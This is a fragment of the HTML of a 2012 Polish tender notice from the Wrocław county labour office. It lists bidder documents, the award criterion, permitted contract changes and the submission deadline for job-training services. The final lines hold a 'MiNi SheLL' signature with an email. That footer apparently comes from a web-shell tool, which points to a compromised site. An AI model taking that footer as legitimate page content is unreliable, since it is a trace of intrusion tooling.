<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony Formularz oferty zgodnie z załącznikiem nr 2 do SIWZ.
2. Program szkolenia przygotowany przez Wykonawcę zgodnie z § 75 ust. 4 rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14 września 2010r. w sprawie standardów i warunków prowadzenia usług rynku pracy (Dz. U. Nr 177 poz. 1193 z późn. zm.) zgodnie z załącznikiem nr 3 do SIWZ.
3. Wzór zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji, zgodnie z wymaganiami określonymi w § 75 ust. 3 rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14 września 2010r. w sprawie standardów i warunków prowadzenia usług rynku pracy (Dz. U. Nr 177 poz. 1193 z późn. zm.). 
4. Oświadczenie dotyczące organizacji praktyk u pracodawców, wg wzoru stanowiącego załącznik nr 11 do SIWZ.
5. Pełnomocnictwo w formie oryginału lub kopii poświadczonej notarialnie w sytuacji, gdy Wykonawca składa ofertę przez ustanowionego pełnomocnika. Pełnomocnictwo musi zawierać wskazanie ustanowionego pełnomocnika oraz zakres jego umocowania.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmian postanowień zawartych w umowie w przypadku:
1) zmiany osób prowadzących zajęcia na szkoleniu oraz opiekunów uczestników praktyki. Po uzyskaniu pisemnej zgody Zamawiającego, w szczególnie uzasadnionych przypadkach (np. choroba, zgon, lub inna sytuacja losowa, której nie można było wcześniej przewidzieć) Wykonawca może dokonać wymiany osób wskazanych do wykonania przedmiotu umowy. W takiej sytuacji Wykonawca przedstawi Zamawiającemu pisemnie propozycję zmiany wraz z jej uzasadnieniem, wskazując osobę/y o co najmniej równych kwalifikacjach i doświadczeniu. Jednocześnie Wykonawcy nie przysługuje roszczenie o zwrot kosztów wynikających bezpośrednio lub pośrednio  z wymiany osób, wyznaczonych przez Wykonawcę do wykonania przedmiotu zamówienia. Zamawiający może żądać od Wykonawcy zmiany osób przewidzianych do realizacji szkolenia, jeżeli uzna, że osoby te nienależycie wykonują swoje obowiązki. W takiej sytuacji Zamawiający pisemnie przedstawi powody, dla których żąda zmiany osób realizujących zamówienie i wskaże termin, w jakim Wykonawca zobowiązany będzie wskazać nowe osoby spełniające wymogi Zamawiającego. Kwalifikacje i doświadczenie nowych osób muszą być co najmniej równe jak u osób zastępowanych,
2) zmiany w harmonogramie zajęć z przyczyn losowych, pod warunkiem zachowania terminu realizacji umowy, za zgodą Zamawiającego,
3) zmiany miejsc przeprowadzenia szkolenia, w tym miejsca organizacji praktyk u pracodawców,                 w szczególnie uzasadnionych przypadkach niezależnych od Wykonawcy, w tym na uzasadniony wniosek bezrobotnego, po uzyskaniu pisemnej zgody Zamawiającego. W takiej sytuacji Wykonawca przedstawi Zamawiającemu pisemnie propozycję zmiany wraz z jej uzasadnieniem, wskazując propozycje miejsca szkolenia/praktyk na terenie miasta Wrocław, o co najmniej porównywalnych warunkach. Wykonawcy nie przysługuje roszczenie o zwrot kosztów wynikających bezpośrednio lub pośrednio ze zmiany miejsca szkolenia/praktyk.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> pup.wroclaw.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy we Wrocławiu, ul. Gliniana 20-22, 50-525 Wrocław, pok. 202 - II piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.06.2012 godzina 10:00, miejsce: Powiatowy Urząd Pracy we Wrocławiu, ul. Gliniana 20-22, 50-525 Wrocław, kancelaria (parter, pokój nr 04).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com